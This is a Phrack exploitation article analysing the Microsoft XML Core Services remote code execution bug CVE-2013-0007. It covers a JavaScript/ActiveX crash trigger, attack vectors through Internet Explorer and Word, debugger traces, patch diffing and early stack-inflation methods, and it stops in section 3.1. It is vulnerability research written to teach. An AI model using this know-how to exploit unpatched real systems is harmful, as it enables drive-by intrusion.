                              ==Phrack Inc.==

                Volume 0x0f, Issue 0x45, Phile #0x0a of 0x10

|=----------------------------------------------------------------------=|
|=---------------=[      The Art of Exploitation      ]=----------------=|
|=----------------------------------------------------------------------=|
|=--=[ Self-patching Microsoft XML with misalignments and factorials ]=-=|
|=----------------------------------------------------------------------=|
|=------------------------=[ by Alisa Esage ]=--------------------------=|
|=-------------------------=[ hey@alisa.sh ]=---------------------------=|
|=----------------------------------------------------------------------=|

"Maybe it says something about human nature, that the only form of
life we have created so far is purely destructive."
                              -- Stephen Hawking on computer viruses

"I've tried to imagine what it would be like to be a newcomer [in
vulnerability research] in current times and it's a bit depressing..."
                              -- Aaron Portnoy for PHRACK

In this article a vulnerable Microsoft XML module is directed into
invulnerable behavior by self-serving a two-byte inline memory patch
through an arbitrary code execution opportunity.

--[ Table of contents

1 - Introduction
2 - The vulnerability
  2.1 - The trigger
  2.2 - The impact vectors
  2.3 - Analyzing the crash
  2.4 - Estimating exploitability
  2.5 - Patch analysis and the root cause
3 - The control
  3.1 - Inflating the stack 1: XSLT recursion
  3.2 - Inflating the stack 2: JavaScript recursion
  3.4 - Filling the memory 1: images
  3.5 - Filling the memory 2: integers
  3.6 - Recursion control
  3.7 - Program counter control
4 - The self-patch
  4.1 - A leak without a leak
  4.2 - The offset-to-value translation
5 - Further work
6 - Conclusion
7 - Thanks
8 - References
9 - Code

--[ 1 - Introduction

As a 'new school' binary vulnerability researcher, I have found it
somewhat challenging to learn the subject at a time when it has become
highly commercialized, which has pushed detailed technical security
advisories and technical analyses of regular vulnerabilities out of
public access. While this article is, first of all, a piece of fun
research, it was also written with fellow beginners in mind: it aims to
summarize the foundational skills, techniques, and thinking patterns
required to analyze and control a modern, mundane, yet somewhat offbeat
binary vulnerability. Besides revisiting the foundations, the article
introduces a few pieces of novel information, such as Microsoft XML Core
Services internals and some observations on heap spraying and stack
manipulation with the latest Internet Explorer.

The article covers a comprehensive, deep technical analysis and control
of the remote code execution vulnerability in Microsoft XML Core
Services, CVE-2013-0007, for the purpose of self-patching. All the
research and proof-of-concept prototyping were done on a deliberately
synthetic platform based on x86 Windows 7 with IE11 (which did not even
exist at the time of the vulnerability discovery), with all updates
installed except the one specific patch, and with the full page heap
setting enabled for the target process.

Although the vulnerability is two years old, the research is fully
relevant to the modern situation. The author is not aware of any public
or private exploits or technical analyses for the described
vulnerability, which is actually quite interesting and unique. Regarding
the vulnerable software, remote code execution bugs in Microsoft XML Core
Services are not rare, if anything under-represented in public sources,
as one was discovered by the low-skilled author herself in late 2014
(CVE-2014-4118). Vulnerabilities in Microsoft XML may be highly critical
because they allow not only for drive-by exploitation of Internet
Explorer, but also for multiple impact vectors beyond the browser.

The code provided in this article is totally unreliable. This is
guaranteed by the highly entropic nature of the vulnerability, which
causes at least a 25% probability of an uncontrollable crash, as well as
by superficial coding and testing choices. In addition, the statements
concerning undocumented Windows internals are based heavily on debugging
observations on a couple of test systems and should be verified with
reverse engineering.

--[ 2 - The vulnerability

The vulnerability in question is a critical remote code execution bug in
Microsoft XML Core Services, affecting every edition of the Windows
operating system existing at the time of the discovery, according to the
original security bulletin. It was patched in early 2013 with the
Microsoft Security Bulletin MS13-002 [1] and the update KB2757638 (on x86
Windows 7), which was later superseded by KB2939576.

Although the bug can be reproduced with the four major versions of the
MSXML module (3, 4, 5, 6) that may co-exist and even execute side by side
on the target system, only version 6 is invoked by default on modern
systems.
Version 3 is still present on default installations of Windows 7 and 8.1
for backward compatibility, contained within the module msxml3.dll, and
may be invoked in the same script as version 6 by explicitly creating the
"MSXML2.DOMDOCUMENT.3.0" ActiveXObject. Version 5 was shipped with
Microsoft Office up to version 2007, and version 4 may be present on the
system with 3rd party software as part of the obsolete MSO SDK.
Additionally, some fuzzing efforts allowed us to deduce that versions 4,
5 and 6 are largely based on a shared code base, while version 3 has
distinctly different code with version-specific bugs.

Since the most current version, 6, is contained in the module
msxml6.dll, all further references to Microsoft XML internals refer to
msxml6.dll version 6.30.7600.16385.

--[ 2.1 - The trigger

The original crash-inducing code, published [2] by the researcher without
much detail, was a piece of XSLT code:

XSLT is a standard XML-based language for analyzing and transforming
given XML data according to given rules, and is itself written in XML.
This suggests that the bug might be triggered via any application that
uses the XSL transformation functionality of Microsoft XML Core Services.

--[ 2.2 - The impact vectors

After doing some research on the XSL transformation functionality in
various Windows software, I've come up with the following draft table of
theoretically possible impact vectors and tested some of them:

*------------------------------------------------------------------------*
|# | Target app        | Technique             | Testing comments        |
|--+-------------------+-----------------------+-------------------------|
|1 | cscript           | Call to MSXML ActiveX |                         |
|  |                   | method transformNode()| Crash (Windows 7)       |
|--+-------------------+-----------------------+-------------------------|
|2 | Internet Explorer | Call to MSXML ActiveX |                         |
|  |                   | method transformNode()| Crash                   |
|  |                   |                       | (Windows 7 + IE9/IE11)  |
|--+-------------------+-----------------------+-------------------------|
|3 | DotNetNuke        | Unknown               | From the original       |
|  |                   |                       | publication, not tested |
|--+-------------------+-----------------------+-------------------------|
|4 | SharePoint        | Unknown               | From the original       |
|  |                   |                       | publication, not tested |
|--+-------------------+-----------------------+-------------------------|
|5 | Microsoft Word    | Call to MSXML ActiveX |                         |
|  |                   | via a macro           | Crash (Office 2010)     |
|--+-------------------+-----------------------+-------------------------|
|6 | Microsoft Word    | Native XML-XSL        |                         |
|  |                   | transformation via an |                         |
|  |                   | XSD schema            | May be possible if      |
|  |                   |                       | relies upon MSXML*1,    |
|  |                   |                       | not tested              |
|--+-------------------+-----------------------+-------------------------|
|7 | Microsoft Word    | Call to MSXML ActiveX |                         |
|  |                   | method transformNode()|                         |
|  |                   | via an embedded       |                         |
|  |                   | JavaScript in a       | Crash (Office 2007)     |
|  |                   | Microsoft ActiveX     |                         |
|  |                   | control               |                         |
|--+-------------------+-----------------------+-------------------------|
|8 | Microsoft Word    | Call to the directly  |                         |
|  |                   | embedded ActiveX      | Not possible*2          |
|--+-------------------+-----------------------+-------------------------|
|9 | Microsoft Project | Native XML-XSL        |                         |
|  |                   | transformation        | May be possible*3,      |
|  |                   |                       | not tested              |
|--+-------------------+-----------------------+-------------------------|
|* | Arbitrary app*4   | Call to MSXML ActiveX |                         |
|  |                   | method transformNode()| Definitely possible,    |
|  |                   |                       | not tested              |
*------------------------------------------------------------------------*

*1 Applying an XSLT Transform [Word 2003 XML Reference]
   http://msdn.microsoft.com/en-us/library/office/ee364545(v=office.11).aspx
*2 OOXML does not implement the functionality to call ActiveX methods,
   although it can instantiate them: [MS-OE376]: Office Implementation
   Information for ECMA-376 Standards Support
   http://msdn.microsoft.com/en-us/library/ff533853(v=office.12).aspx
*3 How to: Use XSLT Transformations with Project XML Data Interchange
   Files
   http://msdn.microsoft.com/en-us/library/office/bb968529(v=office.12).aspx
*4 ...which uses MSXML's COM/ActiveX module

The above table of possible impact vectors is far from exhaustive. Most
obviously, it should include at least the other Microsoft Office
applications, in addition to Word and Project.

--[ 2.3 - Analyzing the crash

One of the ways to trigger the XSL transformation functionality of
Microsoft XML Core Services is to call the transformNode() method of the
COM/ActiveX object MSXML2.DOMDocument.6.0 via e.g. JavaScript:

    xslcontent='< xsl:template name="xx" match="x[position()]" />';
    srcTree=new ActiveXObject("Msxml2.DOMDocument.6.0");
    xsltTree=new ActiveXObject("Msxml2.DOMDocument.6.0");
    xsltTree.loadXML(xslcontent);
    alert("crash");
    srcTree.transformNode(xsltTree);

The above code, when executed either with the cscript command line
utility or from within an Internet Explorer web page, will produce a
crash due to an invalid memory read attempt, similar to the following:

(5f8.9d4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=ad9004d6 ebx=0e419ff0 ecx=0e419f42 edx=6f6e4430 esi=0e419f40 edi=04d6ac70 eip=6f6f9c85 esp=04d6ac6c ebp=04d6ad88 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 msxml6!XEngine::stns+0x6: 6f6f9c85 8b5008 mov edx,dword ptr [eax+8] ds:0023:ad9004de=???????? An observation can be made across multiple tests that the crashing memory address varies a little bit from test to test, but always falls into a somewhat persistent address range in the kernel memory, which actually causes the access violation. Looking at the stack dump we can surmise that the crash occurs during the processing of a particular XSLT instruction, represented by the function XEngine::stns(), by the MSXML's XEngine' virtual machine: 0:007> k ChildEBP RetAddr 04d6ac68 6f6e60cc msxml6!XEngine::stns+0x6 04d6ad88 6f6e60cc msxml6!XEngine::frame+0x84 04d6ae08 6f6f3e2d msxml6!XEngine::frame+0x84 04d6aeb8 6f75ffb0 msxml6!XEngine::execute+0x1b4 04d6af14 6f75fee3 msxml6!XUtility::executeXCode+0x90 04d6af68 6f75fe2b msxml6!XUtility::transformNode+0x4a 04d6afd4 6f75fda2 msxml6!DOMNode::transformNode+0xa6 04d6afe8 6f7460c9 msxml6!DOMDocumentWrapper::transformNode+0x17 04d6b004 6f760b71 msxml6!DOMNode::_invokeDOMNode+0x30e ... Indeed, further analysis reveals a virtual machine execution loop, in which the function XEngine::frame() is responsible for the execution of the current fragment of 'XCode'. XCode is essentially a dynamically constructed sequence of pointers to member functions of the XEngine class along with their arguments, that was compiled from the input XSLT markup: 0:007> u msxml6!XEngine::frame l30 msxml6!XEngine::frame: ... 6f6e6092 call msxml6!XEngineFrame::initFrame (6f6e72c3) ... 
; increment the pointer to the chain of XEngine functions: 6f6e60b8 add dword ptr [esi+0A0h],10h ; loop: 6f6e60bf mov eax,dword ptr [esi+0A0h];retrieve the next XEngine proc 6f6e60c5 mov ecx,dword ptr [eax+4] ; retrieve the argument 6f6e60c8 add ecx,esi ; increment the pointer to a global structure 6f6e60ca call dword ptr [eax] ; call the XEngine proc 6f6e60cc add dword ptr [esi+0A0h],eax 6f6e60d2 je msxml6!XEngine::frame+0x95 (6f6e60dd) 6f6e60d4 cmp byte ptr [esi+0B8h],0 6f6e60db je msxml6!XEngine::frame+0x77 (6f6e60bf) ; loop The XCode which corresponds to the vulnerable XSLT code may be observed by dumping of the current XEngine frame, which reveals the list of pointers to functions to be called sequentially, as well as their arguments: 0:007> p eax=06ca9ff4 ebx=06ca9ff0 ecx=0513b010 edx=0513b0a0 esi=06ca9f40 edi=0513b010 eip=6f6e60bf esp=0513b010 ebp=0513b088 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 msxml6!XEngine::frame+0x77: 6f6e60bf mov eax,dword ptr [esi+0A0h] ds:0023:06ca9fe0=6cf0c806 0:007> dds poi(esi+a0) 06c8f05c 6f6e6046 msxml6!XEngine::frame 06c8f060 00000000 06c8f064 00000030 06c8f068 c0c0c000 06c8f06c 6f6f9bba msxml6!XEngine::ldc_i 06c8f070 00000000 06c8f074 00000000 06c8f078 6f6f16e8 msxml6!XEngine::br 06c8f07c 00000000 06c8f080 00000128 06c8f084 6f6e6046 msxml6!XEngine::frame 06c8f088 00000000 06c8f08c 000000d0 06c8f090 c0c0c000 06c8f094 6f6e7868 msxml6!XEngine::ctxt 06c8f098 00000000 06c8f09c 0000000c 06c8f0a0 6f6e7399 msxml6!XEngine::ch 06c8f0a4 00000000 06c8f0a8 00000024 06c8f0ac 06c8bde4 06c8f0b0 6f6f16e8 msxml6!XEngine::br 06c8f0b4 00000000 06c8f0b8 0000000c 06c8f0bc 6f6f9c7f msxml6!XEngine::stns 06c8f0c0 00000002 06c8f0c4 6f6fcf32 msxml6!XEngine::locldns 06c8f0c8 00000000 06c8f0cc 00000050 06c8f0d0 6f6fa250 msxml6!XEngine::brns 06c8f0d4 00000000 06c8f0d8 0000009c ... 
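
The dispatch loop described above can be modelled with a small JavaScript sketch. This is a toy model under stated assumptions, not MSXML code: the slot layout ({ proc, arg }), the function runFrame() and the three stub handlers are invented for illustration, and the step size is counted in slots rather than bytes. It only shows how the per-slot argument is added to the engine pointer before each handler call, and how an argument of 2 hands a shifted pointer to the handler.

```javascript
// Toy model of the dispatch loop in XEngine::frame(); not MSXML code.
// Each XCode slot holds a handler ("proc") and an argument that the loop
// adds to the engine pointer before the call, like `add ecx,esi`.
function runFrame(xcode, engineBase) {
  const calls = [];
  let ip = 0; // plays the role of the XCode pointer kept at [esi+0A0h]
  while (ip < xcode.length) {
    const slot = xcode[ip];
    const thisPtr = (engineBase + slot.arg) >>> 0; // ecx = esi + argument
    calls.push({ name: slot.proc.name, thisPtr: thisPtr });
    const advance = slot.proc(thisPtr); // handler reports how far to step
    if (advance === 0) break; // simplification: a zero step ends the frame
    ip += advance;
  }
  return calls;
}

// Hypothetical stub handlers: they do nothing except return a step size.
function ldc_i(thisPtr) { return 1; }
function stns(thisPtr) { return 1; }
function brns(thisPtr) { return 0; }

const engineBase = 0x06ca9f40; // the value of esi in the dump above
const trace = runFrame(
  [
    { proc: ldc_i, arg: 0 },
    { proc: stns, arg: 2 }, // the corrupted argument
    { proc: brns, arg: 0 },
  ],
  engineBase
);

for (const call of trace) {
  console.log(call.name, "0x" + call.thisPtr.toString(16).padStart(8, "0"));
}
```

In this model only stns() receives the shifted pointer (0x06ca9f42), while the handlers before and after it see the intact base.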
Each function of the XEngine class works with an undocumented global s structure, referenced by the registers esi or ecx within the class code. The structure holds pointers to MSXML's virtual address tables, stack pointers and some other values: 0:007> dds esi l40 06ca9f40 6f6c1754 msxml6!SXPQCompiler::`vftable' 06ca9f44 6f6e75d8 msxml6!XEngine::`vftable' 06ca9f48 00000008 06ca9f4c 6f6e75c8 msxml6!XEngine::CurrentExprEval::`vftable' 06ca9f50 6f6e75d0 msxml6!XEngine::GlobalExprEval::`vftable' 06ca9f54 06ca9f40 06ca9f58 06ca9f78 06ca9f5c 06c8bda8 06ca9f60 00000000 06ca9f64 00000000 06ca9f68 00000000 06ca9f6c 00000000 06ca9f70 00000000 06ca9f74 00000000 06ca9f78 6f6e7620 msxml6!XRuntime::`vftable' ... In the vulnerable code, the pointer to the structure is being incremented in the XEngine loop, within the XEngine::frame() function, by the value provided in the XCode frame: ; loop: 6f6e60bf mov eax,dword ptr [esi+0A0h];retrieve the next XEngine proc 6f6e60c5 mov ecx,dword ptr [eax+4] ; retrieve the argument 6f6e60c8 add ecx,esi ; increment the pointer to the global structure The reason of the crash is that, immediately before entering the XEngine::stns() function, the pointer to the global structure is incremented by the invalid value of 2: msxml6!XEngine::frame+0x82: 6f6e60ca call dword ptr [eax];ds:0023:0d5af0bc={msxml6!XEngine::stns} 0:007> u eip-10 msxml6!XEngine::frame+0x72: ... 6f6e60bf mov eax,dword ptr [esi+0A0h] 6f6e60c5 mov ecx,dword ptr [eax+4] 6f6e60c8 add ecx,esi 6f6e60ca call dword ptr [eax] 0:007> dds poi(esi+a0) 06c8f0bc 6f6f9c7f msxml6!XEngine::stns 06c8f0c0 00000002 Next, when the improperly incremented pointer is dereferenced in XEngine::stns(), it leads to the misaligned memory access and invalid values being retrieved, causing the crash: msxml6!XEngine::stns+0x6: 6f6f9c85 mov edx,dword ptr [eax+8] ds:0023:b010051b=???????? ; where did eax come from? 
0:007> u eip-6
msxml6!XEngine::stns:
; should point to the global structure
6f6f9c7f mov eax,dword ptr [ecx+0B0h]
6f6f9c85 mov edx,dword ptr [eax+8]
...

0:007> dds ecx
; looks like total garbage, but it's actually due to the misalignment...
06ca9f42 75d86f6c shell32!__dyn_tls_init_callback (shell32+0x5f6f6c)
06ca9f46 00086f6e
06ca9f4a 75c80000 shell32!__dyn_tls_init_callback (shell32+0x4f0000)
06ca9f4e 75d06f6e shell32!__dyn_tls_init_callback (shell32+0x576f6e)
06ca9f52 9f406f6e
...

; ...and the correctly aligned structure actually starts 2 bytes earlier:
0:007> dds ecx-2
06ca9f40 6f6c1754 msxml6!SXPQCompiler::`vftable'
06ca9f44 6f6e75d8 msxml6!XEngine::`vftable'
06ca9f48 00000008
06ca9f4c 6f6e75c8 msxml6!XEngine::CurrentExprEval::`vftable'
06ca9f50 6f6e75d0 msxml6!XEngine::GlobalExprEval::`vftable'
06ca9f54 06ca9f40
06ca9f58 06ca9f78
06ca9f5c 06c8bda8
06ca9f60 00000000
...

At this point the vulnerability does not look very promising: the
crashing memory address is read through a valid pointer to internal
program data, shifted by exactly two bytes.
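
The effect of the two-byte shift can be reproduced outside the debugger. The sketch below rebuilds the first four dwords of the structure from the aligned dump (dds ecx-2) and reads them back at byte offsets 2, 6 and 10, the way a little-endian x86 dword load would. The helper names readDword() and hex32() are made up for this illustration.

```javascript
// First four dwords of the structure, taken from the aligned dump above.
const alignedDwords = [0x6f6c1754, 0x6f6e75d8, 0x00000008, 0x6f6e75c8];

// Lay them out in memory in little-endian byte order, as on x86.
const memory = new DataView(new ArrayBuffer(alignedDwords.length * 4));
alignedDwords.forEach((value, i) => memory.setUint32(i * 4, value, true));

// Little-endian dword read at an arbitrary (possibly misaligned) offset.
function readDword(view, byteOffset) {
  return view.getUint32(byteOffset, true);
}

function hex32(value) {
  return value.toString(16).padStart(8, "0");
}

// Offsets 2, 6 and 10 correspond to 06ca9f42, 06ca9f46 and 06ca9f4a.
const misaligned = [2, 6, 10].map((offset) => hex32(readDword(memory, offset)));
console.log(misaligned.join(" ")); // prints "75d86f6c 00086f6e 75c80000"
```

The three values match the "garbage" dwords shown by dds ecx: each is the upper half of one valid field glued to the lower half of the next.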
--[ 2.4 - Estimating exploitability Let's observe the vulnerable XCode frame once again: 0:007> dds poi(esi+a0) 06c8f05c 6f6e6046 msxml6!XEngine::frame 06c8f060 00000000 06c8f064 00000030 06c8f068 c0c0c000 06c8f06c 6f6f9bba msxml6!XEngine::ldc_i 06c8f070 00000000 06c8f074 00000000 06c8f078 6f6f16e8 msxml6!XEngine::br 06c8f07c 00000000 06c8f080 00000128 06c8f084 6f6e6046 msxml6!XEngine::frame 06c8f088 00000000 06c8f08c 000000d0 06c8f090 c0c0c000 06c8f094 6f6e7868 msxml6!XEngine::ctxt 06c8f098 00000000 06c8f09c 0000000c 06c8f0a0 6f6e7399 msxml6!XEngine::ch 06c8f0a4 00000000 06c8f0a8 00000024 06c8f0ac 06c8bde4 06c8f0b0 6f6f16e8 msxml6!XEngine::br 06c8f0b4 00000000 06c8f0b8 0000000c 06c8f0bc 6f6f9c7f msxml6!XEngine::stns 06c8f0c0 00000002 06c8f0c4 6f6fcf32 msxml6!XEngine::locldns 06c8f0c8 00000000 06c8f0cc 00000050 06c8f0d0 6f6fa250 msxml6!XEngine::brns 06c8f0d4 00000000 We can see that, at some point after the execution of the XEngine::stns() function, the XEngine::brns() function will be called, that contains a dynamic call: msxml6!XEngine::brns: 712da250 mov edi,edi 712da252 push esi 712da253 mov esi,ecx 712da255 mov ecx,dword ptr [esi+0A4h] 712da25b mov eax,dword ptr [ecx] ; {msxml6!ChildNodeSet::`vftable'} 712da25d call dword ptr [eax] ; dynamic call The dynamic call address in XEngine::brns() derives from the same place in memory where XEngine::stns() wrote something: msxml6!XEngine::stns: 6f6f9c7f mov eax,dword ptr [ecx+0B0h] 6f6f9c85 mov edx,dword ptr [eax+8] 6f6f9c88 push esi 6f6f9c89 lea esi,[edx+0Ch] 6f6f9c8c mov dword ptr [eax+8],esi 6f6f9c8f mov eax,dword ptr [edx+4] 6f6f9c92 push 8 6f6f9c94 mov dword ptr [ecx+0A4h],eax ; wrote something 6f6f9c9a pop eax 6f6f9c9b pop esi 6f6f9c9c ret More precisely, the written value derives from the crashing memory address: msxml6!XEngine::stns: 6f6f9c7f mov eax,dword ptr [ecx+0B0h] 6f6f9c85 mov edx,dword ptr [eax+8] ; read (crashes here) 6f6f9c88 push esi 6f6f9c89 lea esi,[edx+0Ch] 6f6f9c8c mov dword ptr [eax+8],esi 
6f6f9c8f mov eax,dword ptr [edx+4] ; read 6f6f9c92 push 8 6f6f9c94 mov dword ptr [ecx+0A4h],eax ; write 6f6f9c9a pop eax 6f6f9c9b pop esi 6f6f9c9c ret Which means that, in the case that the crashing memory was readable, an address value would be read from that memory, to be call'ed later within XEngine::brns(). What happens here is probably some manipulations with the virtual address tables of the XEngine class. However in the vulnerable context, because the global pointer is only corrupted in stns() while being intact in brns(), only two upper bytes of the final memory destination will be overwritten: ; read(+B0+2)=0c6f0027d, write(+A4+2)=0c79c027d, call(+A4)=027dc7b4: 0:005> dpp ecx-2 L30 ... 04388840 045ea780 711d31e8 msxml6!Vector::`vftable' 04388844 0438bab8 711d1754 msxml6!SXPQCompiler::`vftable' 04388848 04389484 71209c7f msxml6!XEngine::stns +0A4h 0438884c 027dc7b4 711f44b8 msxml6!RTFNodeSet::`vftable' 04388850 027dc79c 711f44b8 msxml6!RTFNodeSet::`vftable' 04388854 045e02b0 711ddcf8 msxml6!Name::`vftable' +0B0h 04388858 027dc5d0 027dc6f0 0438885c 027dc6f0 027dc770 04388860 00000000 In other words, it might be possible to control at most the higher word of the pointer used to retrieve the dynamic call address. Next, because of the 2-bytes misaligned memory read in XEngine::stns(), the crashing address is essentially a composition of two valid stack pointers: msxml6!XEngine::stns+0x6: 6f6f9c85 8b5008 mov edx,dword ptr [eax+8] ds:0023:b040053a=???????? 
; composed from the two valid stack pointers: 0:007> dds ecx+b0-2 0d5c9ff0 0532af20 0d5c9ff4 0532b040 ; both of them on the stack: 0:007> k ChildEBP RetAddr 0532af18 6f6e60cc msxml6!XEngine::stns+0x6 0532b038 6f6e60cc msxml6!XEngine::frame+0x84 ; ...the pointers 0532b0b8 6f6f3e2d msxml6!XEngine::frame+0x84 0532b168 6f75ffb0 msxml6!XEngine::execute+0x1b4 That is, the upper word of the crashing memory address is equal to the lower word of the stack address, located somewhere within the local variables frame of XEngine::frame(). Which means that, in this particular vulnerability context, the crashing memory address depends exclusively on the stack layout. Next, it was mentioned in the original publication that slightly different crashes could be observed by modifying the vulnerable XSLT code. Indeed, the following XSLT code would cause a 6-bytes misaligned memory access in XEngine::stns(): However, a 6-bytes misaligned pointer crash is not possible to control, because it can only yield the null page read: 0:005> dpp ecx+6 L30 ... 042a8840 0480a760 715e31e8 msxml6!Vector::`vftable' 042a8844 042abab8 715e1754 msxml6!SXPQCompiler::`vftable' 042a8848 042a9484 71619c7f msxml6!XEngine::stns 042a884c 0269c684 716044b8 msxml6!RTFNodeSet::`vftable' 042a8850 0269c66c 716044b8 msxml6!RTFNodeSet::`vftable' 042a8854 048002b0 715edcf8 msxml6!Name::`vftable' 042a8858 0269c4a0 0269c5c0 042a885c 0269c5c0 0269c640 042a8860 00000000 ; it's always null 042a8864 00000000 All in all, the vulnerability looks quite exploitable at this point. --[ 2.5 - Patch analysis and the root cause I decided to look at the exact root cause of the vulnerability in order to see if there might be any other ways to control it besides messing with the thread stack. May the pointer incrementing value be controlled? Or maybe, any opportunities to trigger the vulnerability with a completely different input XSLT code? 

Because the vulnerability is already patched, it's possible to leverage
patch analysis for the root cause investigation. From binary diffing of
the patch we can see that the crashing procedure XEngine::stns() was not
even patched. Instead, the XEngine::frame() procedure was patched by
completely removing the pointer incrementing code:

*---------------------------------------------------*
| Vulnerable code         | Patched code            |
|-------------------------+-------------------------|
| loc_726C60BF:           | loc_726C6BB6:           |
| mov eax, [esi+0A0h]     | mov eax, [esi+9Ch]      |
| mov ecx, [eax+4]        | mov ecx, esi            |
| add ecx, esi            | -                       |
| call dword ptr [eax]    | call dword ptr [eax]    |
| add [esi+0A0h], eax     | add [esi+9Ch], eax      |
*---------------------------------------------------*

But where exactly did the invalid incremental value originate? Among the
few dozen procedures modified by the patch, there is a group of XCodeGen
class functions, all of which initialize the XCode frame:

.text:72733631 ; public: void __thiscall XCodeGen::brns(unsigned char *)
.text:72733631 ?brns@XCodeGen@@QAEXPAE@Z proc near
.text:7273363A xor esi, esi
.text:7273363C mov edx, offset XEngine::brns(void)
.text:72733641 mov [eax+4], esi ; the argument
.text:72733644 mov [eax], edx ; the function address

In the above code, two XCode frame slots are initialized: the call
pointer (set to the address of XEngine::brns() in this case) and the
incremental value (set to zero). In fact, all functions of the XCodeGen
class initialize the incremental value to zero.
But then, in some cases the value becomes corrupted after the call to XCodeGen::ensureCapacity(): .text:726C6B93 ; public: void __thiscall XCodeGen::ch(class NavFilter *) .text:726C6B93 ?ch@XCodeGen@@QAEXPAVNavFilter@@@Z proc near .text:726C6B93 .text:726C6B93 arg_0 = dword ptr 8 .text:726C6B93 .text:726C6B93 mov edi, edi .text:726C6B95 push ebp .text:726C6B96 mov ebp, esp .text:726C6B98 push ebx .text:726C6B99 push esi .text:726C6B9A push edi .text:726C6B9B push 10h .text:726C6B9D mov esi, ecx .text:726C6B9F mov edi, offset XEngine::ch(void) .text:726C6BA4 xor ebx, ebx .text:726C6BA6 call XCodeGen::ensureCapacity(uint) .text:726C6BAB mov [eax], edi ; ebx *should* be zero unless ensureCapacity() messes with it: .text:726C6BAD mov [eax+4], ebx And the actual corruption takes place inside the ASTCodeGen::xpathFunctionCode() function, which sets some bits of the incremental value with either mask 2 or 4 (or possibly, both): msxml6!ASTCodeGen::xpathFunctionCode+0x347: 720abf20 5e pop esi 720abf21 5b pop ebx 720abf22 5d pop ebp 720abf23 c20400 ret 4 720abf26 8b4604 mov eax,dword ptr [esi+4] 720abf29 8b4018 mov eax,dword ptr [eax+18h] 720abf2c 83481002 or dword ptr [eax+10h],2 ... 
msxml6!ASTCodeGen::xpathFunctionCode+0x12a: 720ef0f6 83481004 or dword ptr [eax+10h],4 720ef0fa 8b4e04 mov ecx,dword ptr [esi+4] 720ef0fd e80a000000 call msxml6!XCodeGen::last (720ef10c) 720ef102 e918cefbff jmp msxml6!ASTCodeGen::xpathFunctionCode+0x346 There is a jump table, likely a case switch, that refers to both of the bit-setting code branches: ; DATA XREF: ASTCodeGen::xpathFunctionCode(FunctionCallNode *)+31r .text:72738022 off_72738022 dd offset loc_7271C27D .text:72738022 dd offset loc_7273731D .text:72738022 dd offset loc_7273CD36 .text:72738022 dd offset loc_7273DB58 .text:72738022 dd offset loc_727373BF .text:72738022 dd offset loc_726FD455 .text:72738022 dd offset loc_726FDD0C .text:72738022 dd offset loc_72737FD8 .text:72738022 dd offset loc_7271C388 .text:72738022 dd offset loc_72737393 .text:72738022 dd offset loc_7273F9A6 .text:72738022 dd offset loc_72737FEF .text:72738022 dd offset loc_726F95D7 .text:72738022 dd offset loc_727373BF .text:72738022 dd offset loc_727373BF .text:72738022 dd offset loc_727373C6 .text:72738022 dd offset loc_726FF1C8 .text:72738022 dd offset loc_7271C3D0 .text:72738022 dd offset loc_727373BF .text:72738022 dd offset loc_726FAD0A .text:72738022 dd offset loc_7273E8DD .text:72738022 dd offset loc_726FAF60 .text:72738022 dd offset loc_726FA10C .text:72738022 dd offset loc_726F9CCB .text:72738022 dd offset loc_726FCCEA By looking through other switch cases in the table we can confirm that none of them performs any other write operations with the memory location in question. Thus, the pointer incremental value can only be set to the three values: 2, 4, and 6 (2 OR 4), of which only the first case would be controllable. Next, because the actual corrupting code (the OR instruction) was not eliminated by the patch, but rather, the incrementing instruction was eliminated, we have to assume that there might be other code paths which rely upon corrupted values. 
But the likeliness of this is low beyond the scope of the XEngine class, of which the main function XEngine::frame() was already patched. So, I dropped this opportunity as not worthy of investigation. Another opportunity that must be considered is, if it might be possible to control the original values from which the crashing pointer was composed. But, in the debugging context it's clear that the values are just pointers to local variables and thus unlikely to be controlled directly: msxml6!XEngine::stns+0x6: 6f6f9c85 8b5008 mov edx,dword ptr [eax+8] ds:0023:b040053a=???????? 0:007> dds ecx+b0-2 0d5c9ff0 0532af20 0d5c9ff4 0532b040 0:005> u eip-30 l30 msxml6!XEngine::execute+0xad: ... 711c3d8c 8d45a4 lea eax,[ebp-5Ch] ... 711c3d8f 8983a4000000 mov dword ptr [ebx+0A4h],eax As a side note, the patch analysis for this case would not have been possible without prior knowledge of the crash triggering input and the crash context, because the patched code is so far away from both the crashing code and the vulnerability root cause, while the volume of code modifications introduced by the patch is huge. --[ 3 - The control At this point it's clear that the only reasonable way to control the vulnerability is to inflate the stack so that the crashing pointer would fall into userland memory area that can possibly be controlled: msxml6!XEngine::stns+0x6: 6f6f9c85 8b5008 mov edx,dword ptr [eax+8] ds:0023:b040053a=???????? 0:007> u eip-6 msxml6!XEngine::stns: 6f6f9c7f 8b81b0000000 mov eax,dword ptr [ecx+0B0h] 6f6f9c85 8b5008 mov edx,dword ptr [eax+8] 0:007> dds ecx+b0-2 0d5c9ff0 0532af20 0d5c9ff4 0532b040 0:007> k ChildEBP RetAddr 0532af18 6f6e60cc msxml6!XEngine::stns+0x6 0532b038 6f6e60cc msxml6!XEngine::frame+0x84 0532b0b8 6f6f3e2d msxml6!XEngine::frame+0x84 0532b168 6f75ffb0 msxml6!XEngine::execute+0x1b4 Given the above listing, it would be nice to have the second XEngine::frame() call happening around e.g. 
0x05320300, which would send the crashing pointer value 0x0300053a to
XEngine::stns(), pointing to the heap. This requires that, prior to the
vulnerable procedure call, the thread make function calls and stack frame
allocations worth approximately 42 kilobytes of stack memory and never
pop them.

--[ 3.1 - Inflating the stack 1: XSLT recursion

The obvious way to inflate the stack is to generate a recursion on the
stack, which should be possible with any dynamic technology available to
the target application. My first idea was to use XSLT itself for this.
Indeed, the following code, which is the classical Tower of Hanoi
algorithm implemented in XSLT, will produce a massive recursion on the
stack (for the record, it might even DoS the browser with a big enough
$n):

Sadly, the XSLT-based recursion inflates the stack above, not below, the
stack frame that the crashing pointer is sourced from, and thus the
recursion does not affect the crashing context at all:

ChildEBP RetAddr
0ed783e8 711b60cc msxml6!XEngine::stns
0ed78588 711b60cc msxml6!XEngine::frame+0x84
0ed78728 711b60cc msxml6!XEngine::frame+0x84
0ed788c8 711b60cc msxml6!XEngine::frame+0x84
0ed78a68 711b60cc msxml6!XEngine::frame+0x84
0ed78c08 711b60cc msxml6!XEngine::frame+0x84
0ed78da8 711b60cc msxml6!XEngine::frame+0x84
; skipped many frame()'s
